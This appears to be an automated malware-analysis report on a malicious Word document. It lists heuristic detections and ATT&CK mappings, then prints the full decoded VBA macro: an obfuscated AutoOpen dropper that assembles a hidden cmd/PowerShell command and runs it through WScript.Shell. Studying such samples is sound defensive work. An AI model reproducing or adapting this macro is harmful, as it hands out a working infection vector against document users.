MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes WScript.Shell and CreateObject, indicating an intent to execute arbitrary commands, likely to download and run a second-stage payload. The presence of these critical heuristics and the macro's structure strongly suggest malicious intent.
Heuristics 10
-
ClamAV: Doc.Malware.Generic-6668129-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6668129-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Error 82430 / jZwzi / 82867 * iLwsqS SLVSFXt = CreateObject("WScript.Shell") _ . _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Error 82430 / jZwzi / 82867 * iLwsqS SLVSFXt = CreateObject("WScript.Shell") _ . _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "mpYijqLwRj" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10927 bytes |
SHA-256: 0f3dc9bb43f05af224845bc7ebd02f22fbd68a1518174291edf3d94dfab678f7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
148 of 240 identifiers look randomly generated (e.g. 'dwcNZCjjdtaSa'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "dwcNZCjjdtaSa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MjMiMjXLHS"
Function JUumPUlXL()
On Error Resume Next
Error UrrDWq * awfJb * EEWHY / azikIY
Error rpthQc / YDVrr
RvTnUkpqw = "MD /V" + "^:O" + "n/C " + " " + " " + Chr(1 + 0 + 4 + 0 + 29) + " ^S"
Error HSIvV * 27348
Error wswzf * BQjiU / 48649 / RzdYaw
Error Ozohi * HjidCI
wFlIwUcHf = "^et ^ ^" + " ^" + " " + "^s" + "^5" + "7W=A^A" + "C^A^g^" + "A^A^IA"
Error 70425 * vpmwmM * wzmFU * wXisO
Error KMJLp * BEcJLX / 25785 / DIsEO
ChVvMLAw = "^A" + "C" + "^" + "AgA^A" + "IA^AC" + "^A^g" + "^AAIA" + "AC^A" + "g^A^" + "AIA^A" + "C"
Error XnVzjh / 1836
Error 38139 * kDzrt
Error hHzsPq / 76287 * 98655 * zfoWqs
Error cQzLr / IkMnq * plATMk * luJlO
Error LfTQj / bGDLKW
AvdfVwn = "A^gAA^" + "IA" + "A" + "CA^g^" + "AQf^A0" + "HA7" + "B^AaAM" + "G" + "A0B" + "^QYAMG" + "A^9" + "BwO" + "^A^sG^A"
Error lkapN * 99200 * 45894 * ZpnDtW
GSPzOPKc = "^h^B^" + "QZ^A" + "I^HA^i" + "B^w^OA8" + "G^A^" + "m^Bgc^A" + "^QCA"
Error CPiRk / nHaOZS
Error rAiLo * pBAni
Error 55695 * RzadYj
Error 71956 / 96558 / 38634 * FfEtzC
Error 68818 / zzXAl
qslmPuilR = "^gA^Qb^" + "A^" + "UG" + "^A0" + "BQ^S" + "A0CA" + "l^B^w" + "^aA8" + "GA" + "^" + "2^BgbAk" + "E^"
Error iNSJG / azziS / XTmKVA / PpzSfh
Error cjPoci / JzXstY
olNSo = "A7^AQ^" + "KA^" + "8^G" + "^AmB" + "gcAQC^A" + "^gAAL^" + "Ak" + "^F^AvB"
Error QBwiLR / dCZojf / ncjVwS / 67848
Error 80646 / lJnnd
aDwvOGvzwq = "Q^SA" + "QC^A^" + "oAQ" + "^Z^A^wG" + "^A^pB^" + "gRAQGA"
Error CMCdk / hLzlmC
Error 66094 * fRHsj / 64656 / lrDIW
Error BdvAvz * jSrJrt * nVzGmi * fiDMwW
Error iEjQK / IUDXL
lJDssGCIbk = "^h" + "B^wb^Aw" + "^G" + "AuBwdA" + "^8^GA^" + "EB^gLA^" + "I^GA^" + "0"
Error 11879 * 57988 * 68207 * OsIdK
Error zsabY / BipPJ / ftCpd * DZPzT
Error BGFTMO * VLSVdo
Error YQQVwF / YzPWu * 85811 * wdhwIL
aOBwVU = "Bw" + "SAQC" + "A" + "^7^BQ" + "^" + "e^A"
JUumPUlXL = RvTnUkpqw + wFlIwUcHf + ChVvMLAw + AvdfVwn + GSPzOPKc + qslmPuilR + olNSo + aDwvOGvzwq + lJDssGCIbk + aOBwVU
Error 95575 / DYJzE
Error rMwUi / jjQoEU * DaoKt * wwwqFR
Error vwQwO / 8269 / 20672 * DiZGN
Error 28557 * zzbYw / 36593 * OVJum
End Function
Function JEnupYJwh()
On Error Resume Next
Error SjjiWv / SJYwW / kwFTmQ * WrDNla
Error 10575 / dPQMl
SDbJZwBI = "^I^HA" + "^0" + "B^w^e^A" + "kC^" + "Av^BQT" + "^A" + "^oGAk" + "A^AI^" + "A4G"
Error wsUYb / iJzaUj
Error oHPdp / aNGZB
nUCfhwz = "^ApB^A^" + "IA^kF^A" + "v" + "BQS" + "A" + "^" + "QC" + "^A^o^A" + "A^" + "aA^M^" + "GAh^B"
Error hsnNY / MMPCwu
Error 62685 / swiUt
dhWIDUzD = "^Q^" + "Z^AIH" + "^A" + "v^B" + "^g^" + "Z" + "A^sD" + "^AnA^"
Error 94245 * vuuNdT / 40655 * bbmjoY
Error wbJPq * 64109
PEuXmr = "QZ" + "^A^g^H" + "^A^l" + "^B" + "g^L^A" + "cCArA^A" + "R" + "^A" + "IGA^i^"
Error UTjGjK * CwGTq / 35533 / PYUhf
Error 61376 * GLiijm * 91942 / Siwzj
Error 70168 * EiPjV
WaFUHVW = "B" + "A" + "^JA^s" + "CA" + "n^A^" + "AXAcC" + "^A" + "rA^wYAk" + "^GAs^"
Error 101 * tJATYb * 10110 * dCWoS
Error 44989 * 49130
Error vdwDF / SDkXUW * Fwhzaf / ojVSC
Error zrAkcF * SkiHzu / 24935 * UzmCIj
pGttoVFBWc = "BgY^A" + "^UH^" + "A" + "^wBg^OA" + "^Y^H^A" + "^uBQ^Z" + "A" + "^QC" + "A^9^Aw^" + "b"
Error pEvEq * 4759
Error OCEFiB / bMIjB * 36624 / jKaXAz
LJYQHH = "^" + "AYG^" + "A" + "^y^B^A" + "J^As^"
Error sLslfo * 9114 / SVztw / BDKiRz
wiGDcBBh = "D^AnAQN" + "^AA^" + "DAx^" + "Aw^J" + "^AAC^" + "A9AA" + "^I^A" + "QE^Ai^B" + "g^Y^A^" + "QC^A" + "7^AQ^K" + "A" + "cC^A^A^"
Error cONAKd / 21190
qzCVKFChqA = "Bw^J" + "^A^gCA" + "^0BQa^A" + "^" + "wGAw" + "B^w^U" + "A^4C" + "An^A^Qb" + "^A^M^" + "H^" + "Ak^Bg^Y" + "^A^gE" + "^A"
Error 37594 / OtSSQW
Error asEVVF * 65744 * 53441 * HqGtA
Error 550 / 24451
TtKjFOW = "v^" + "AwcA^Q^" + "G" + "^A" + "hB" + "^wbA^w^" + "GAw" + "B" + "Q^" + "d" + "^" + "A^8CA^" + "0^B"
Error XKVli * 51672
Error oHVlsm / LdSiv / wrRLHW * QcfhRl
JLnltD = "^g" + "^b" + "AUG^A" + "^0" + "^Bg" + "^" + "bA^8G" + "^"
Error HSnoT * 92825 / 87131 / AjQKi
Error 33742 / jFSsQw * 43871 * WFGpow
Error 12772 * OEzhXN / BnwbAE * wtiLb
kSROHDFCF = "AjBQ^L^" + "AA" + "H" + "A3BwLAU" + "^G^A0B^" + "QaA" + "MHA" + "i^BQ^" + "ZAc" + "HA" + "vA^Q" + "^bA8G^" + "Aj^"
JEnupYJwh = SDbJZwBI + nUCfhwz + dhWIDUzD + PEuXmr + WaFUHVW + pGttoVFBWc + LJYQHH + wiGDcBBh + qzCVKFChqA + TtKjFOW + JLnltD + kSROHDFCF
Error omPKqZ / iwvGJ * CJvtSN * 79847
Error MGmJs * 8670
End Function
Function ObASoj()
On Error Resume Next
Error fkKsBz / 80200
Error zqPaq * rPiotz
Error bRsSm * nqABwc / 22641 * 13179
jzPJksJW = "B^" + "gL^A" + "^Q^D^Av" + "^Bgc^" + "A^A" + "^HAl^B" + "gc^A8C" + "^Av^Ag^" + "O^" + "AA^H^" + "A^0BAd" + "^A"
Error 98525 / FGHwa / 94673 / KliEtj
qLRizBfD = "g^" + "G^AA" + "^BA" + "^W^" + "A^M" + "DAvA^Q" + "bA^8GAj" + "^"
Error Liwri / jABFo / WzjjK / czuJl
Error 92423 / tNUWUD / DizFm * zXnoSa
Error 53929 * HopXP / 19403 * FMdSqi
QJSlJt = "B" + "^gL" + "A^w^G^" + "A^pB^wc" + "A^" + "EG" + "Ay^B^" + "g" + "^Y^" + "A8G^Ak"
Error cwIZG / GBzGv
NhNvnC = "^B^gY^" + "A^IH^" + "Ah^BQb^" + "A^8CAvA" + "g" + "^O^A^" + "A^H^A^" + "0BAd^" + "A" + "^g^" + "GA^A^Bg" + "c^" + "A^s^G"
Error 40740 / wAUHoT * Qzsszw / 24296
Error 92730 / zwqsTB / JhoFk * qWkBbv
Error frBYsl / QpoIX
Error 74862 / hfKazL / 70545 * ostuAc
Error jiklw * PmaXX / bGVSPt / lkXNvz
tihwjXP = "^Ar^" + "B^" + "QOAYHA" + "^2^BAb" + "^A^kDAv" + "A"
Error WwjZq * obZoEv
Error AtdRXI / NOzuLu / 10707 * iOLWK
Error 90433 * WRVAU / QNfzqJ / wTRbhS
Error 59639 * AEoKa
Error LjJBSs * rjirFZ
Error 60973 * dkaKLh * wBBpW * QzDOZP
hCnlbWjFqz = "gc^" + "A" + "^Y^G" + "^A^u^" + "Awc^A^" + "E^" + "GAr^B^" + "Qd^A^w" + "G^AuA^Q" + "^MA"
Error jhVVcN / wJbXbd
Error QlGcr * snYbln / 9036 * KELtYz
Error dOjVXz / MrTFtk
Error ViCWU * zcPhUF * PWsLq * WRDcq
Error MqHYBY / WVfEa * JPdRk * iisdq
TwQIwWqw = "A" + "^H" + "A3^Bw" + "LA^8C" + "A^6^" + "A^AcAQH" + "A0" + "^BA" + "aA" + "AEA"
Error 39013 / CUMQd
mQfUavVbEI = "2A^wc" + "A8C^A" + "t^B^wb" + "A^M^G" + "^AuA^" + "Q" + "YA^kH^A" + "^h^Bg" + "^Y" + "AE^G^" + "AyBQ" + "^dA" + "^M^H^"
Error 54931 / wKGbo * hIMLAL * jnXYjS
vlYHwQij = "A" + "w^B^w^b" + "AQ^H^A" + "h^B" + "gcAE^GA" + "^j" + "B^QYA" + "c^"
Error cJuhbz / EQnZt
Error LiiavU / 7706 / 53887 * MtYMf
zTORLz = "G^A^u^" + "B^QZ^A" + "^A" + "^" + "H^" + "Au" + "^A^g^" + "bA" + "E^G^A" + "p^BQ^Y^"
ObASoj = jzPJksJW + qLRizBfD + QJSlJt + NhNvnC + tihwjXP + hCnlbWjFqz + TwQIwWqw + mQfUavVbEI + vlYHwQij + zTORLz
Error 15156 / HOKdJI
Error 71735 * IQzctO / NEkmnR * UHKdG
Error WGbTQ / jkBNLh
Error KjnCSS * bLcSdJ / SQFpRt / 26046
End Function
Function nAzzLrMfvdG()
On Error Resume Next
Error QDdqG * dcuvwA
Error 96827 * Yaabsz
Error vSlIVP / 68620
Error zLliH / kbLRmZ
Error ToEusH * Sfrct / 63967 / ZwzoQS
qMMwjAdXHI = "AI^" + "H^A^" + "l^B^" + "w^Y" + "^AI^H" + "^A" + "^l^B^A"
Error vlUud * IKtOi * 21886 / VaSKt
HjDQGQfG = "c" + "AE^G^A" + "^yB" + "Q" + "^YA^" + "M^"
Error INzJhD * KGHiYw
jvQUAZSu = "G^AhB^w" + "Z^A4^" + "G^A^" + "lB^Ac" + "^A8C^" + "Av^Ag" + "OAA^" + "HA" + "^"
Error kwbfF / InXUl * PcAnGA / MRXWnl
Error 92141 * 45743 * 14904 * oArPdf
BFNOsJdr = "0B^A" + "^d" + "^A^gGA" + "A^B^wRA" + "A^F^" + "AiB^w" + "c^A"
Error 61237 / mMiMAE
Error 85673 / zWiGz / 92485 * icYOn
pYPaqEzU = "s^G^A^" + "G^B" + "^Q^b" + "A^I^H" + "Av^AQ" + "Z" + "A^sG^Au" + "^A" + "w^b^AM" + "^G" + "Au^A" + "wcA^Q"
Error 48037 / rwAZf
Error OoMbou * 90063 / QWZwG / SjoIib
Error 84677 / 24502 / 78626 * msJjjq
Error 57885 / XuGcj * 46891 / jLviC
mRnjIWh = "^H^A^uB" + "^QdA" + "8G^" + "A" + "t^B" + "^g^Y" + "AU" + "^G^" + "A^3B^" + "wLA8C" + "A6AAc^A"
nAzzLrMfvdG = qMMwjAdXHI + HjDQGQfG + jvQUAZSu + BFNOsJdr + pYPaqEzU + mRnjIWh
Error FRwzQB * lTUAS * 19075 * 62052
Error UfnUPR / JkGUv
End Function
Function LCPiiwCsXW()
On Error Resume Next
Error 22223 / 55168 * jGihF / nhjMT
Error RDWODC / OpzlV
Error 94097 * rsaQC
Error 74461 / 66531
GFsFajN = "Q^HA0" + "B" + "^Aa^Ac" + "CA^" + "9" + "A^w" + "bA0E" + "A^q^BA" + "^J^AsD" + "A" + "0B^g^"
Error 70280 * Poirj * RiHsvF / 17149
Error 35307 * zfodw / JfqQt / bUsAnz
Error ibBUQz * YOaZm
Error AFOwW / 53973 * 73179 / TOKwi
MkSwaJAG = "b^A^UG^" + "ApBA^b^" + "AM^E^" + "A^iBQZ^" + "AcF^" + "Au^A^A" + "^dAU^G" + "^A^" + "O^BAIAQ" + "HA^" + "j" + "BQ^Z^A^" + "oGA"
Error HFirlw * KIkGw
Error IOozu / FfHSHw
Error iNmdb * dZzjB * nwZUHS * 94150
Error SBzWr / GthsFo / Sfjid / oWHDl
YatkbnMcwGj = "^i^B^" + "wb" + "A" + "0CA3" + "^BQ" + "ZA^"
Error OhiXrE * zOirLM / iYHLI / MzrlEj
Error 55156 / Yqmzb * 5952 * bFdatv
iqDwwc = "4^G" + "^A^9A" + "^" + "g^Y" + "A^Q^H^A" + "L^BA" + "^J^ ^e-"
Error tkKqtY / ksSCW / Thnbl / ptSHr
Error 32502 * MjzUt
Error zWHNrf / zObws
RufGROVWZE = " ^l^l^" + "eh^sr^" + "ewo^p& " + "f^" + "oR " + " /^L %" + "^G ^"
Error 50634 * SCMasd * aXDHEG / iRoMsF
Error AMRKXL / iwWjiZ
Error RVArKr / 16933
zVzvBSwQj = "IN " + "(^ ^" + " ^ " + " ^10" + "^61" + ",^ ^ ^" + "-1^" + " ^ ^" + " ^"
Error 66770 * mTEsYH / 76681 / qNoUm
Error 32946 / wfqHAj
Error 71267 * 82851 / BSmRW / qQIJr
sSzKLYcPj = ",^ 0 ^" + " ^ )" + "d^O " + " " + "^sE" + "^t " + " ^t^Kz" + "=!" + "^t^Kz!!"
Error QzwHCk * znrnZ / jPiaM / NzwQlt
Error UXzuzR * SDDrK / cTLtFQ * iFwZQJ
huNcjHHpdDr = "^s^5" + "7W:" + "~ %" + "^G, 1" + "!&& ^" + "i^F " + "%^G " + " L^" + "E^Q "
Error 42215 / CRqIw / NzDjAi / hKOqp
Error aZinD / BFHjHv
azMal = "^" + "0 ca^l^" + "L %" + "^t^Kz" + ":~^ ^ ^" + "-^1" + "^06" + "2% " + " " + " " + Chr(1 + 0 + 4 + 0 + 29) + " "
LCPiiwCsXW = GFsFajN + MkSwaJAG + YatkbnMcwGj + iqDwwc + RufGROVWZE + zVzvBSwQj + sSzKLYcPj + huNcjHHpdDr + azMal
Error 71595 * 57924
Error aaHCC * 65385
Error 95241 * CvTqLm * 88853 / JmntTi
Error NAWlh / brEiE / 52961 / OTCDv
Error VRFFzK / 78098 * TXRjm * 15562
End Function
Attribute VB_Name = "mpYijqLwRj"
Sub AutoOpen()
On Error Resume Next
Error 50877 * 69896
Error 80640 * 76323
Error 82430 / jZwzi / 82867 * iLwsqS
SLVSFXt = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(1 + 0 + 2 + 8 + 56) + IfVBtJOR + MHozuTHI + JUumPUlXL + JEnupYJwh + ObASoj + nAzzLrMfvdG + LCPiiwCsXW + jIhVLDHFYtGT + ifNXDpTZVVw, 711730862 - 711730862)
Error BItcCs * JRPFk * 8988 / NKnLXW
Error 85878 / 36976
Error 33721 * 64194 / LaCWB * hOhOnK
Error qYWif * Qczzz
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.